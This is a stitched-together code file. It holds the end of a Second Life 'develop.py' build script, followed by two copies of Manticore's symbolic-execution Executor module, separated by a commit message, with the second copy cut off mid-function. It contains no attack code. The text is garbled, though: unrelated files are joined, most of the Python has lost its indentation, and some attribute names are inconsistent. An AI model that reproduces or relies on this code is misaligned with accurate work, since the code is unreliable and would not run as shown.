               (key_str, value_str))
        try:
            return self.get_HKLM_registry_value(key_str, value_str)
        except WindowsError, err:
            # 64-bit Windows keeps 32-bit software keys under Wow6432Node.
            key_str = (r'SOFTWARE\Wow6432Node\Microsoft\VisualStudio\%s\Setup\VS' %
                       self.gens[gen]['ver'])

        try:
            return self.get_HKLM_registry_value(key_str, value_str)
        except:
            print >> sys.stderr, "Didn't find ", self.gens[gen]['gen']

        return ''

    def get_build_cmd(self):
        # Return (executable, command string) for the configured builder.
        if self.incredibuild:
            config = self.build_type
            if self.gens[self.generator]['ver'] in [ r'8.0', r'9.0' ]:
                config = '\"%s|Win32\"' % config
            executable = 'buildconsole'
            cmd = "%(bin)s %(prj)s.sln /build /cfg=%(cfg)s" % {'prj': self.project_name, 'cfg': config, 'bin': executable}
            return (executable, cmd)

        # devenv.com is CLI friendly, devenv.exe... not so much.
        executable = '%sdevenv.com' % (self.find_visual_studio(),)
        cmd = ('"%s" %s.sln /build %s' %
               (executable, self.project_name, self.build_type))
        return (executable, cmd)

    def run(self, command, name=None, retry_on=None, retries=1):
        '''Run a program.  If the program fails, raise an exception.'''
        assert name is not None, 'On windows an executable path must be given in name.'
        if os.path.isfile(name):
            path = name
        else:
            path = self.find_in_path(name)[0]
        # NOTE(review): the loop does not break after a successful call, so
        # with retries > 1 a command that succeeds is run again; and if the
        # final attempt fails with the retry_on status, no exception is
        # raised -- confirm both behaviors are intended.
        while retries:
            retries = retries - 1
            print "develop.py tries to run:", command
            ret = subprocess.call(command, executable=path)
            print "got ret", ret, "from", command
            if ret:
                error = 'exited with status %d' % ret
                if retry_on is not None and retry_on == ret:
                    print "Retrying... the command %r %s" % (name, error)
                else:
                    raise CommandError('the command %r %s' % (name, error))

    def run_cmake(self, args=[]):
        '''Override to add the vstool.exe call after running cmake.'''
        PlatformSetup.run_cmake(self, args)
        if self.unattended == 'OFF':
            self.run_vstool()

    def run_vstool(self):
        # Set the startup project and active config in each solution; a
        # stamp file avoids re-running when the build type is unchanged.
        for build_dir in self.build_dirs():
            stamp = os.path.join(build_dir, 'vstool.txt')
            try:
                prev_build = open(stamp).read().strip()
            except IOError:
                prev_build = ''
            if prev_build == self.build_type:
                # Only run vstool if the build type has changed.
                continue
            executable = os.path.join('tools','vstool','VSTool.exe')
            vstool_cmd = (executable +
                          ' --solution ' +
                          os.path.join(build_dir,'SecondLife.sln') +
                          ' --config ' + self.build_type +
                          ' --startup secondlife-bin')
            print 'Running %r in %r' % (vstool_cmd, getcwd())
            self.run(vstool_cmd, name=executable)
            print >> open(stamp, 'w'), self.build_type

    def run_build(self, opts, targets):
        cwd = getcwd()
        executable, build_cmd = self.get_build_cmd()
        for d in self.build_dirs():
            try:
                os.chdir(d)
                if targets:
                    for t in targets:
                        cmd = '%s /project %s %s' % (build_cmd, t, ' '.join(opts))
                        print 'Running %r in %r' % (cmd, d)
                        self.run(cmd, name=executable, retry_on=4, retries=3)
                else:
                    cmd = '%s %s' % (build_cmd, ' '.join(opts))
                    print 'Running %r in %r' % (cmd, d)
                    self.run(cmd, name=executable, retry_on=4, retries=3)
            finally:
                os.chdir(cwd)
class CygwinSetup(WindowsSetup):
    """Windows build driven from a Cygwin shell.

    Identical to WindowsSetup except that the source path must be
    translated to a DOS-style path (via cygpath) before being handed to
    the native cmake binary.
    """
    def __init__(self):
        super(CygwinSetup, self).__init__()
        self.generator = 'vc80'

    def cmake_commandline(self, src_dir, build_dir, opts, simple):
        # cmake is a native Windows program, so give it a DOS path.
        dos_dir = commands.getoutput("cygpath -w %s" % src_dir)
        args = dict(
            dir=dos_dir,
            generator=self.gens[self.generator.lower()]['gen'],
            opts=quote(opts),
            standalone=self.standalone,
            unattended=self.unattended,
            project_name=self.project_name,
            word_size=self.word_size,
            )
        #if simple:
        #    return 'cmake %(opts)s "%(dir)s"' % args
        # Fix: the UNATTENDED type tag was misspelled 'BOOl' (lowercase
        # ell); use the canonical 'BOOL' spelling as everywhere else.
        return ('cmake -G "%(generator)s" '
                '-DUNATTENDED:BOOL=%(unattended)s '
                '-DSTANDALONE:BOOL=%(standalone)s '
                '-DWORD_SIZE:STRING=%(word_size)s '
                '-DROOT_PROJECT_NAME:STRING=%(project_name)s '
                '%(opts)s "%(dir)s"' % args)
# Dispatch table: sys.platform value -> platform setup class.
setup_platform = {
    'darwin': DarwinSetup,
    'linux2': LinuxSetup,
    'win32' : WindowsSetup,
    'cygwin' : CygwinSetup
    }
usage_msg = '''
Usage: develop.py [options] [command [command-options]]
Options:
-h | --help print this help message
--standalone build standalone, without Linden prebuild libraries
--unattended build unattended, do not invoke any tools requiring
a human response
--universal build a universal binary on Mac OS X (unsupported)
-t | --type=NAME build type ("Debug", "Release", or "RelWithDebInfo")
-m32 | -m64 build architecture (32-bit or 64-bit)
-N | --no-distcc disable use of distcc
-G | --generator=NAME generator name
Windows: VC71 or VS2003 (default), VC80 (VS2005) or
VC90 (VS2008)
Mac OS X: Xcode (default), Unix Makefiles
Linux: Unix Makefiles (default), KDevelop3
-p | --project=NAME set the root project name. (Doesn't effect makefiles)
Commands:
build configure and build default target
clean delete all build directories, does not affect sources
configure configure project by running cmake (default command if none given)
Command-options for "configure":
We use cmake variables to change the build configuration.
-DSERVER:BOOL=OFF Don't configure simulator/dataserver/etc
-DVIEWER:BOOL=OFF Don't configure the viewer
-DPACKAGE:BOOL=ON Create "package" target to make installers
-DLOCALIZESETUP:BOOL=ON Create one win_setup target per supported language
Examples:
Set up a viewer-only project for your system:
develop.py configure -DSERVER:BOOL=OFF
Set up a Visual Studio 2005 project with "package" target:
develop.py -G vc80 configure -DPACKAGE:BOOL=ON
'''
def main(arguments):
if os.getenv('DISTCC_DIR') is None:
distcc_dir = os.path.join(getcwd(), '.distcc')
if not os.path.exists(distcc_dir):
os.mkdir(distcc_dir)
print "setting DISTCC_DIR to %s" % distcc_dir
os.environ['DISTCC_DIR'] = distcc_dir
else:
print "DISTCC_DIR is set to %s" % os.getenv('DISTCC_DIR')
setup = setup_platform[sys.platform]()
try:
opts, args = getopt.getopt(
arguments,
'?hNt:p:G:m:',
['help', 'standalone', 'no-distcc', 'unattended', 'universal', 'type=', 'incredibuild', 'generator=', 'project='])
except getopt.GetoptError, err:
print >> sys.stderr, 'Error:', err
print >> sys.stderr, """
Note: You must pass -D options to cmake after the "configure" command
For example: develop.py configure -DSERVER:BOOL=OFF"""
print >> sys.stderr, usage_msg.strip()
sys.exit(1)
for o, a in opts:
if o in ('-?', '-h', '--help'):
print usage_msg.strip()
sys.exit(0)
elif o in ('--standalone',):
setup.standalone = 'ON'
elif o in ('--unattended',):
setup.unattended = 'ON'
elif o in ('--universal',):
setup.universal = 'ON'
elif o in ('-m',):
if a in ('32', '64'):
setup.word_size = int(a)
else:
print >> sys.stderr, 'Error: unknown word size', repr(a)
print >> sys.stderr, 'Supported word sizes: 32, 64'
sys.exit(1)
elif o in ('-t', '--type'):
try:
setup.build_type = setup.build_types[a.lower()]
except KeyError:
print >> sys.stderr, 'Error: unknown build type', repr(a)
print >> sys.stderr, 'Supported build types:'
types = setup.build_types.values()
types.sort()
for t in types:
print ' ', t
sys.exit(1)
elif o in ('-G', '--generator'):
setup.generator = a
elif o in ('-N', '--no-distcc'):
setup.distcc = False
elif o in ('-p', '--project'):
setup.project_name = a
elif o in ('--incredibuild'):
setup.incredibuild = True
else:
print >> sys.stderr, 'INTERNAL ERROR: unhandled option', repr(o)
sys.exit(1)
if not args:
setup.run_cmake()
return
try:
cmd = args.pop(0)
if cmd in ('cmake', 'configure'):
setup.run_cmake(args)
elif cmd == 'build':
for d in setup.build_dirs():
if not os.path.exists(d):
raise CommandError('run "develop.py cmake" first')
setup.run_cmake()
opts, targets = setup.parse_build_opts(args)
setup.run_build(opts, targets)
elif cmd == 'clean':
if args:
raise CommandError('clean takes no arguments')
setup.cleanup()
else:
print >> sys.stderr, 'Error: unknown subcommand', repr(cmd)
print >> sys.stderr, "(run 'develop.py --help' for help)"
sys.exit(1)
except getopt.GetoptError, err:
print >> sys.stderr, 'Error with %r subcommand: %s' % (cmd, err)
sys.exit(1)
# Script entry point: report CommandError as a clean message plus non-zero
# exit status instead of an unhandled traceback.
if __name__ == '__main__':
    try:
        main(sys.argv[1:])
    except CommandError, err:
        print >> sys.stderr, 'Error:', err
        sys.exit(1)
|
import sys
import time
import os
import copy
import cPickle
import random
import logging
import pstats
import traceback
import signal
import weakref
try:
import cStringIO as StringIO
except:
import StringIO
from math import ceil, log
from ..utils.nointerrupt import WithKeyboardInterruptAs
from .cpu.abstractcpu import DecodeException, ConcretizeRegister
from .memory import ConcretizeMemory
from .smtlib import solver, Expression, Operators, SolverException, Array, BitVec, Bool, ConstraintSet
from ..utils.event import Signal, forward_signals
from ..utils.helpers import issymbolic
from .state import Concretize, TerminateState
from multiprocessing.managers import SyncManager
from contextlib import contextmanager
#This is the single global manager that will handle all shared memory among workers
def mgr_init():
    """Initializer run inside the SyncManager server process.

    Ignores SIGINT so a Ctrl-C in the parent does not kill the shared-state
    manager; shutdown is coordinated explicitly through the Executor instead.
    """
    signal.signal(signal.SIGINT, signal.SIG_IGN)
# Process-wide SyncManager: all shared objects used by worker processes
# (lock, pending-state list, counters, shared context dict) are proxied
# through this single server process.
manager = SyncManager()
manager.start(mgr_init)
#module wide logger
logger = logging.getLogger("EXECUTOR")
def sync(f):
    """ Synchronization decorator.

    Runs the wrapped method while holding ``self._lock`` (here a manager
    Condition, but anything with acquire()/release() works). Uses
    functools.wraps so the wrapper keeps the original name and docstring.
    """
    import functools

    @functools.wraps(f)
    def newFunction(self, *args, **kw):
        self._lock.acquire()
        try:
            return f(self, *args, **kw)
        finally:
            self._lock.release()
    return newFunction
class Policy(object):
    ''' Base class for prioritization of state search.

    features() is called before a state is stored; priority() must return a
    numeric score for a stored state id (higher means the state looks more
    likely to reach the interesting program spot).
    '''
    def __init__(self):
        pass
    def features(self, state):
        ''' Save state features for prioritization before a state is stored '''
        pass
    def priority(self, state_id):
        ''' A numeric value representing likelihood to reach the interesting program spot '''
        return 1.0
class Random(Policy):
    ''' Uniform search policy: every stored state gets the same score. '''
    def __init__(self):
        Policy.__init__(self)
    def features(self, state):
        ''' Nothing to record; selection does not depend on the state. '''
        pass
    def priority(self, state_id):
        ''' Constant score: all states are equally likely to be picked. '''
        return 1.0
class Executor(object):
'''
The executor guides the execution of an initial state or a paused previous run.
It handles all exceptional conditions (system calls, memory faults, concretization, etc.)
'''
def __init__(self, initial=None, workspace=None, policy='random', context=None, **options):
assert os.path.isdir(workspace), 'Workspace must be a directory'
self.workspace = workspace
logger.debug("Workspace set: %s", self.workspace)
# Signals / Callbacks handlers will be invoked potentially at different
# worker processes. State provides a local context to save data.
#Executor signals
self.will_start_run = Signal()
self.will_finish_run = Signal()
self.will_fork_state = Signal()
self.will_store_state = Signal()
self.will_load_state = Signal()
self.will_terminate_state = Signal()
self.will_generate_testcase = Signal()
#Be sure every state will forward us their signals
self.will_load_state += self._register_state_callbacks
#The main executor lock. Acquire this for accessing shared objects
self._lock = manager.Condition(manager.RLock())
#Shutdown Event
self._shutdown = manager.Event()
#States on storage. Shared dict state name -> state stats
self._states = manager.list()
#Number of currently running workers. Initially no runnign workers
self._running = manager.Value('i', 0 )
#Number of generated testcases
self._test_count = manager.Value('i', 0 )
#Number of total intermediate states
self._state_count = manager.Value('i', 0 )
#Executor wide shared context
if context is None:
context = {}
self._shared_context = manager.dict(context)
#scheduling priority policy (wip)
self.policy = Random()
if self.load_workspace():
if initial is not None:
logger.error("Ignoring initial state")
else:
if initial is not None:
self.add(initial)
##FIXME PUBSUB We need to forward signals here so they get declared
##forward signals from initial state so they are declared here
forward_signals(self, initial, True)
@contextmanager
def locked_context(self):
''' Executor context is a shared memory object. All workers share this.
It needs a lock. Its used like this:
with executor.context() as context:
vsited = context['visited']
visited.append(state.cpu.PC)
context['visited'] = visited
'''
with self._lock:
yield self._shared_context
def _register_state_callbacks(self, state, state_id):
'''
Install forwarding callbacks in state so the events can go up.
Going up, we prepend state in the arguments.
'''
#Forward all state signals
forward_signals(self, state, True)
def add(self, state):
'''
Enqueue state.
Save state on storage, assigns an id to it, then add it to the
priority queue
'''
#save the state to secondary storage
state_id = self.store(state)
#add the state to the list of pending states
self.put(state_id)
return state_id
def load_workspace(self):
#Browse and load states in a workspace in case we are trying to
# continue from paused run
saved_states = []
for filename in os.listdir(self.workspace):
if filename.startswith('state_') and filename.endswith('.pkl'):
saved_states.append(self._workspace_filename(filename))
#We didn't find any saved intermediate states in the workspace
if not saved_states:
return False
#search finalized testcases
saved_testcases = []
for filename in os.listdir(self.workspace):
if filename.startswith('test_') and filename.endswith('.pkl'):
saved_testcases.append(self._workspace_filename(filename))
#Load saved states into the queue
for filename in saved_states:
state_id = int(filename[6:-4])
self._states.append(state_id)
#reset test and states counter
for filename in saved_states:
state_id = int(filename[6:-4])
self._state_count.value = max(self._state_counter.value, state_id)
for filename in saved_testcases:
state_id = int(filename[6:-4])
self._test_count.value = max(self._test_counter.value, state_id)
#Return True if we have loaded some sates to continue from
return len(saved_states)>0
################################################
# Workspace filenames
def _workspace_filename(self, filename):
return os.path.join(self.workspace, filename)
def _state_filename(self, state_id):
filename = 'state_%06d.pkl'%state_id
return self._workspace_filename(filename)
def _testcase_filename(self, state_id):
filename = 'test_%06d.pkl'%state_id
return self._workspace_filename(filename)
################################################
#Shared counters
@sync
def _new_state_id(self):
''' This gets an uniq shared id for a new state '''
self._state_count.value += 1
return self._state_count.value
@sync
def _new_testcase_id(self):
''' This gets an uniq shared id for a new testcase '''
self._test_count.value += 1
return self._test_count.value
###############################################
# Synchronization helpers
@sync
def _start_run(self):
#notify siblings we are about to start a run()
self._running.value+=1
@sync
def _stop_run(self):
#notify siblings we are about to stop this run()
self._running.value-=1
assert self._running.value >=0
self._lock.notify_all()
################################################
#Public API
@property
def running(self):
''' Report an estimate of how many workers are currently running '''
return self._running.value
def shutdown(self):
''' This will stop all workers '''
self._shutdown.set()
def is_shutdown(self):
''' Returns True if shutdown was requested '''
return self._shutdown.is_set()
###############################################
# Priority queue
@sync
def put(self, state_id):
''' Enqueue it for processing '''
self._states.append(state_id)
self._lock.notify_all()
return state_id
@sync
def get(self):
''' Dequeue a state with the max priority '''
#A shutdown has been requested
if self.is_shutdown():
return None
#if not more states in the queue lets wait for some forks
while len(self._states) == 0:
#if no worker is running bail out
if self.running == 0:
return None
#if a shutdown has been requested bail out
if self.is_shutdown():
return None
#if there is actually some workers running wait for state forks
logger.debug("Waiting for available states")
self._lock.wait()
state_id = random.choice(self._states)
del self._states[self._states.index(state_id)]
return state_id
###############################################################
# File Storage
def store(self, state):
''' Put state in secondary storage and retuns an state_id for it'''
state_id = self._new_state_id()
state_filename = self._state_filename(state_id)
logger.debug("Saving state %d to file %s", state_id, state_filename)
with open(state_filename, 'w+') as f:
try:
f.write(cPickle.dumps(state, 2))
except RuntimeError:
# there recursion limit exceeded problem,
# try a slower, iterative solution
from ..utils import iterpickle
logger.warning("Using iterpickle to dump state")
f.write(iterpickle.dumps(state, 2))
f.flush()
#broadcast event
self.will_store_state(state, state_id)
return state_id
def load(self, state_id):
''' Brings a state from storage selected by state_id'''
if state_id is None:
return None
filename = self._state_filename(state_id)
logger.debug("Restoring state: %s from %s", state_id, filename )
with open(filename, 'rb') as f:
loaded_state = cPickle.loads(f.read())
logger.debug("Removing state %s from storage", state_id)
os.remove(filename)
#Broadcast event
self.will_load_state(loaded_state, state_id)
return loaded_state
def list(self):
''' Returns the list of states ids currently queued '''
return list(self._states)
def generate_testcase(self, state, message='Testcase generated'):
'''
Create a serialized description of a given state.
:param state: The state to generate information about
:param message: Accompanying message
'''
testcase_id = self._new_testcase_id()
logger.info("Generating testcase No. %d - %s", testcase_id, message)
#broadcast test generation. This is the time for other modules
#to output whatever helps to understand this testcase
self.will_generate_testcase(state, testcase_id, message)
# Save state
start = time.time()
filename = self._testcase_filename(testcase_id)
with open(filename, 'wb') as f:
try:
f.write(cPickle.dumps(state, 2))
except RuntimeError:
# there recursion limit exceeded problem,
# try a slower, iterative solution
from ..utils import iterpickle
logger.debug("WARNING: using iterpickle to dump state")
f.write(iterpickle.dumps(state, 2))
f.flush()
logger.debug("saved in %d seconds", time.time() - start)
def fork(self, state, expression, policy='ALL', setstate=None):
'''
Fork state on expression concretizations.
Using policy build a list of solutions for expression.
For the state on each solution setting the new state with setstate
For example if expression is a Bool it may have 2 solutions. True or False.
Parent
(expression = ??)
Child1 Child2
(expression = True) (expression = True)
setstate(True) setstate(False)
The optional setstate() function is supposed to set the concrete value
in the child state.
'''
assert isinstance(expression, Expression)
if setstate is None:
setstate = lambda x,y: None
#Find a set of solutions for expression
solutions = state.concretize(expression, policy)
#We are about to fork current_state
with self._lock:
self.will_fork_state(state, expression, solutions, policy)
#Build and enqueue a state for each solution
children = []
for new_value in solutions:
with state as new_state:
new_state.constrain(expression == new_value) #We already know it's sat
#and set the PC of the new state to the concrete pc-dest
#(or other register or memory address to concrete)
setstate(new_state, new_value)
#enqueue new_state
state_id = self.add(new_state)
#maintain a list of childres for logging purpose
children.append(state_id)
logger.debug("Forking current state into states %r",children)
return None
def run(self):
'''
Entry point of the Executor; called by workers to start analysis.
'''
#policy_order=self.policy_order
#policy=self.policy
current_state = None
current_state_id = None
with WithKeyboardInterruptAs(self.shutdown):
#notify siblings we are about to start a run
self._start_run()
logger.debug("Starting Manticore Symbolic Emulator Worker (pid %d).",os.getpid())
while not self.is_shutdown():
try:
#select a suitable state to analyze
if current_state is None:
with self._lock:
#notify siblings we are about to stop this run
self._stop_run()
#Select a single state_id
current_state_id = self.get()
#load selected state from secondary storage
current_state = self.load(current_state_id)
#notify siblings we have a state to play with
self._start_run()
#If current_state is still None. We are done.
if current_state is None:
logger.debug("No more states in the queue, byte bye!")
break
assert current_state is not None
try:
# Allows to terminate manticore worker on user request
while not self.is_shutdown():
if not current_state.execute():
break
else:
#Notify this worker is done
self.will_terminate_state(current_state, current_state_id, 'Shutdown')
current_state = None
#Handling Forking and terminating exceptions
except Concretize as e:
#expression
#policy
#setstate()
logger.debug("Generic state fork on condition")
self.fork(current_state, e.expression, e.policy, e.setstate)
current_state = None
except TerminateState as e:
#logger.error("MemoryException at PC: 0x{:016x}. Cause: {}\n".format(current_state.cpu.instruction.address, e.cause))
#self.generate_testcase(current_state, "Memory Exception: " + str(e))
#self.generate_testcase(current_state, "Invalid PC Exception" + str(e))
#self.generate_testcase(current_state, "Program finished correctly")
#logger.error("Syscall not implemented: %s", str(e))
#Notify this worker is done
self.will_terminate_state(current_state, current_state_id, e)
logger.debug("Generic terminate state")
if e.testcase:
self.generate_testcase(current_state, str(e))
current_state = None
except SolverException as e:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
print "*** print_exc:"
traceback.print_exc()
#Notify this state is done
self.will_terminate_state(current_state, current_state_id, e)
if solver.check(current_state.constraints):
self.generate_testcase(current_state, "Solver failed" + str(e))
current_state = None
except (Exception, AssertionError) as e:
import traceback
trace = traceback.format_exc()
logger.error("Exception: %s\n%s", str(e), trace)
for trace_line in trace.splitlines():
logger.error(trace_line)
#Notify this worker is done
self.will_terminate_state(current_state, current_state_id, 'Exception')
current_state = None
logger.setState(None)
assert current_state is None
#notify siblings we are about to stop this run
self._stop_run()
#Notify this worker is done (not sure it's needed)
self.will_finish_run()
stop double-logging error traces (#369)
import sys
import time
import os
import copy
import cPickle
import random
import logging
import pstats
import traceback
import signal
import weakref
try:
import cStringIO as StringIO
except:
import StringIO
from math import ceil, log
from ..utils.nointerrupt import WithKeyboardInterruptAs
from .cpu.abstractcpu import DecodeException, ConcretizeRegister
from .memory import ConcretizeMemory
from .smtlib import solver, Expression, Operators, SolverException, Array, BitVec, Bool, ConstraintSet
from ..utils.event import Signal, forward_signals
from ..utils.helpers import issymbolic
from .state import Concretize, TerminateState
from multiprocessing.managers import SyncManager
from contextlib import contextmanager
#This is the single global manager that will handle all shared memory among workers
def mgr_init():
    """Initializer run inside the SyncManager server process.

    Ignores SIGINT so a Ctrl-C in the parent does not kill the shared-state
    manager; shutdown is coordinated explicitly through the Executor instead.
    """
    signal.signal(signal.SIGINT, signal.SIG_IGN)
# Process-wide SyncManager: every shared object used by worker processes
# (lock, pending-state list, counters, shared context dict) is proxied
# through this single server process.
manager = SyncManager()
manager.start(mgr_init)
#module wide logger
logger = logging.getLogger("EXECUTOR")
def sync(f):
    """ Synchronization decorator.

    Runs the wrapped method while holding ``self._lock`` (here a manager
    Condition, but anything with acquire()/release() works). Uses
    functools.wraps so the wrapper keeps the original name and docstring.
    """
    import functools

    @functools.wraps(f)
    def newFunction(self, *args, **kw):
        self._lock.acquire()
        try:
            return f(self, *args, **kw)
        finally:
            self._lock.release()
    return newFunction
class Policy(object):
    ''' Base class for prioritization of state search.

    features() is called before a state is stored; priority() must return a
    numeric score for a stored state id (higher means the state looks more
    likely to reach the interesting program spot).
    '''
    def __init__(self):
        pass
    def features(self, state):
        ''' Save state features for prioritization before a state is stored '''
        pass
    def priority(self, state_id):
        ''' A numeric value representing likelihood to reach the interesting program spot '''
        return 1.0
class Random(Policy):
    ''' Uniform search policy: every stored state gets the same score. '''
    def __init__(self):
        Policy.__init__(self)
    def features(self, state):
        ''' Nothing to record; selection does not depend on the state. '''
        pass
    def priority(self, state_id):
        ''' Constant score: all states are equally likely to be picked. '''
        return 1.0
class Executor(object):
'''
The executor guides the execution of an initial state or a paused previous run.
It handles all exceptional conditions (system calls, memory faults, concretization, etc.)
'''
def __init__(self, initial=None, workspace=None, policy='random', context=None, **options):
assert os.path.isdir(workspace), 'Workspace must be a directory'
self.workspace = workspace
logger.debug("Workspace set: %s", self.workspace)
# Signals / Callbacks handlers will be invoked potentially at different
# worker processes. State provides a local context to save data.
#Executor signals
self.will_start_run = Signal()
self.will_finish_run = Signal()
self.will_fork_state = Signal()
self.will_store_state = Signal()
self.will_load_state = Signal()
self.will_terminate_state = Signal()
self.will_generate_testcase = Signal()
#Be sure every state will forward us their signals
self.will_load_state += self._register_state_callbacks
#The main executor lock. Acquire this for accessing shared objects
self._lock = manager.Condition(manager.RLock())
#Shutdown Event
self._shutdown = manager.Event()
#States on storage. Shared dict state name -> state stats
self._states = manager.list()
#Number of currently running workers. Initially no runnign workers
self._running = manager.Value('i', 0 )
#Number of generated testcases
self._test_count = manager.Value('i', 0 )
#Number of total intermediate states
self._state_count = manager.Value('i', 0 )
#Executor wide shared context
if context is None:
context = {}
self._shared_context = manager.dict(context)
#scheduling priority policy (wip)
self.policy = Random()
if self.load_workspace():
if initial is not None:
logger.error("Ignoring initial state")
else:
if initial is not None:
self.add(initial)
##FIXME PUBSUB We need to forward signals here so they get declared
##forward signals from initial state so they are declared here
forward_signals(self, initial, True)
@contextmanager
def locked_context(self):
''' Executor context is a shared memory object. All workers share this.
It needs a lock. Its used like this:
with executor.context() as context:
vsited = context['visited']
visited.append(state.cpu.PC)
context['visited'] = visited
'''
with self._lock:
yield self._shared_context
def _register_state_callbacks(self, state, state_id):
'''
Install forwarding callbacks in state so the events can go up.
Going up, we prepend state in the arguments.
'''
#Forward all state signals
forward_signals(self, state, True)
def add(self, state):
'''
Enqueue state.
Save state on storage, assigns an id to it, then add it to the
priority queue
'''
#save the state to secondary storage
state_id = self.store(state)
#add the state to the list of pending states
self.put(state_id)
return state_id
def load_workspace(self):
#Browse and load states in a workspace in case we are trying to
# continue from paused run
saved_states = []
for filename in os.listdir(self.workspace):
if filename.startswith('state_') and filename.endswith('.pkl'):
saved_states.append(self._workspace_filename(filename))
#We didn't find any saved intermediate states in the workspace
if not saved_states:
return False
#search finalized testcases
saved_testcases = []
for filename in os.listdir(self.workspace):
if filename.startswith('test_') and filename.endswith('.pkl'):
saved_testcases.append(self._workspace_filename(filename))
#Load saved states into the queue
for filename in saved_states:
state_id = int(filename[6:-4])
self._states.append(state_id)
#reset test and states counter
for filename in saved_states:
state_id = int(filename[6:-4])
self._state_count.value = max(self._state_counter.value, state_id)
for filename in saved_testcases:
state_id = int(filename[6:-4])
self._test_count.value = max(self._test_counter.value, state_id)
#Return True if we have loaded some sates to continue from
return len(saved_states)>0
################################################
# Workspace filenames
def _workspace_filename(self, filename):
return os.path.join(self.workspace, filename)
def _state_filename(self, state_id):
filename = 'state_%06d.pkl'%state_id
return self._workspace_filename(filename)
def _testcase_filename(self, state_id):
filename = 'test_%06d.pkl'%state_id
return self._workspace_filename(filename)
################################################
#Shared counters
@sync
def _new_state_id(self):
''' This gets an uniq shared id for a new state '''
self._state_count.value += 1
return self._state_count.value
@sync
def _new_testcase_id(self):
''' This gets an uniq shared id for a new testcase '''
self._test_count.value += 1
return self._test_count.value
###############################################
# Synchronization helpers
@sync
def _start_run(self):
#notify siblings we are about to start a run()
self._running.value+=1
@sync
def _stop_run(self):
#notify siblings we are about to stop this run()
self._running.value-=1
assert self._running.value >=0
self._lock.notify_all()
################################################
#Public API
@property
def running(self):
''' Report an estimate of how many workers are currently running '''
return self._running.value
def shutdown(self):
''' This will stop all workers '''
self._shutdown.set()
def is_shutdown(self):
''' Returns True if shutdown was requested '''
return self._shutdown.is_set()
###############################################
# Priority queue
@sync
def put(self, state_id):
''' Enqueue it for processing '''
self._states.append(state_id)
self._lock.notify_all()
return state_id
@sync
def get(self):
''' Dequeue a state with the max priority '''
#A shutdown has been requested
if self.is_shutdown():
return None
#if not more states in the queue lets wait for some forks
while len(self._states) == 0:
#if no worker is running bail out
if self.running == 0:
return None
#if a shutdown has been requested bail out
if self.is_shutdown():
return None
#if there is actually some workers running wait for state forks
logger.debug("Waiting for available states")
self._lock.wait()
state_id = random.choice(self._states)
del self._states[self._states.index(state_id)]
return state_id
###############################################################
# File Storage
def store(self, state):
''' Put state in secondary storage and retuns an state_id for it'''
state_id = self._new_state_id()
state_filename = self._state_filename(state_id)
logger.debug("Saving state %d to file %s", state_id, state_filename)
with open(state_filename, 'w+') as f:
try:
f.write(cPickle.dumps(state, 2))
except RuntimeError:
# there recursion limit exceeded problem,
# try a slower, iterative solution
from ..utils import iterpickle
logger.warning("Using iterpickle to dump state")
f.write(iterpickle.dumps(state, 2))
f.flush()
#broadcast event
self.will_store_state(state, state_id)
return state_id
def load(self, state_id):
''' Brings a state from storage selected by state_id'''
if state_id is None:
return None
filename = self._state_filename(state_id)
logger.debug("Restoring state: %s from %s", state_id, filename )
with open(filename, 'rb') as f:
loaded_state = cPickle.loads(f.read())
logger.debug("Removing state %s from storage", state_id)
os.remove(filename)
#Broadcast event
self.will_load_state(loaded_state, state_id)
return loaded_state
def list(self):
''' Returns the list of states ids currently queued '''
return list(self._states)
def generate_testcase(self, state, message='Testcase generated'):
'''
Create a serialized description of a given state.
:param state: The state to generate information about
:param message: Accompanying message
'''
testcase_id = self._new_testcase_id()
logger.info("Generating testcase No. %d - %s", testcase_id, message)
#broadcast test generation. This is the time for other modules
#to output whatever helps to understand this testcase
self.will_generate_testcase(state, testcase_id, message)
# Save state
start = time.time()
filename = self._testcase_filename(testcase_id)
with open(filename, 'wb') as f:
try:
f.write(cPickle.dumps(state, 2))
except RuntimeError:
# there recursion limit exceeded problem,
# try a slower, iterative solution
from ..utils import iterpickle
logger.debug("WARNING: using iterpickle to dump state")
f.write(iterpickle.dumps(state, 2))
f.flush()
logger.debug("saved in %d seconds", time.time() - start)
def fork(self, state, expression, policy='ALL', setstate=None):
'''
Fork state on expression concretizations.
Using policy build a list of solutions for expression.
For the state on each solution setting the new state with setstate
For example if expression is a Bool it may have 2 solutions. True or False.
Parent
(expression = ??)
Child1 Child2
(expression = True) (expression = True)
setstate(True) setstate(False)
The optional setstate() function is supposed to set the concrete value
in the child state.
'''
assert isinstance(expression, Expression)
if setstate is None:
setstate = lambda x,y: None
#Find a set of solutions for expression
solutions = state.concretize(expression, policy)
#We are about to fork current_state
with self._lock:
self.will_fork_state(state, expression, solutions, policy)
#Build and enqueue a state for each solution
children = []
for new_value in solutions:
with state as new_state:
new_state.constrain(expression == new_value) #We already know it's sat
#and set the PC of the new state to the concrete pc-dest
#(or other register or memory address to concrete)
setstate(new_state, new_value)
#enqueue new_state
state_id = self.add(new_state)
#maintain a list of childres for logging purpose
children.append(state_id)
logger.debug("Forking current state into states %r",children)
return None
def run(self):
'''
Entry point of the Executor; called by workers to start analysis.
'''
#policy_order=self.policy_order
#policy=self.policy
current_state = None
current_state_id = None
with WithKeyboardInterruptAs(self.shutdown):
#notify siblings we are about to start a run
self._start_run()
logger.debug("Starting Manticore Symbolic Emulator Worker (pid %d).",os.getpid())
while not self.is_shutdown():
try:
#select a suitable state to analyze
if current_state is None:
with self._lock:
#notify siblings we are about to stop this run
self._stop_run()
#Select a single state_id
current_state_id = self.get()
#load selected state from secondary storage
current_state = self.load(current_state_id)
#notify siblings we have a state to play with
self._start_run()
#If current_state is still None. We are done.
if current_state is None:
logger.debug("No more states in the queue, byte bye!")
break
assert current_state is not None
try:
# Allows to terminate manticore worker on user request
while not self.is_shutdown():
if not current_state.execute():
break
else:
#Notify this worker is done
self.will_terminate_state(current_state, current_state_id, 'Shutdown')
current_state = None
#Handling Forking and terminating exceptions
except Concretize as e:
#expression
#policy
#setstate()
logger.debug("Generic state fork on condition")
self.fork(current_state, e.expression, e.policy, e.setstate)
current_state = None
except TerminateState as e:
#logger.error("MemoryException at PC: 0x{:016x}. Cause: {}\n".format(current_state.cpu.instruction.address, e.cause))
#self.generate_testcase(current_state, "Memory Exception: " + str(e))
#self.generate_testcase(current_state, "Invalid PC Exception" + str(e))
#self.generate_testcase(current_state, "Program finished correctly")
#logger.error("Syscall not implemented: %s", str(e))
#Notify this worker is done
self.will_terminate_state(current_state, current_state_id, e)
logger.debug("Generic terminate state")
if e.testcase:
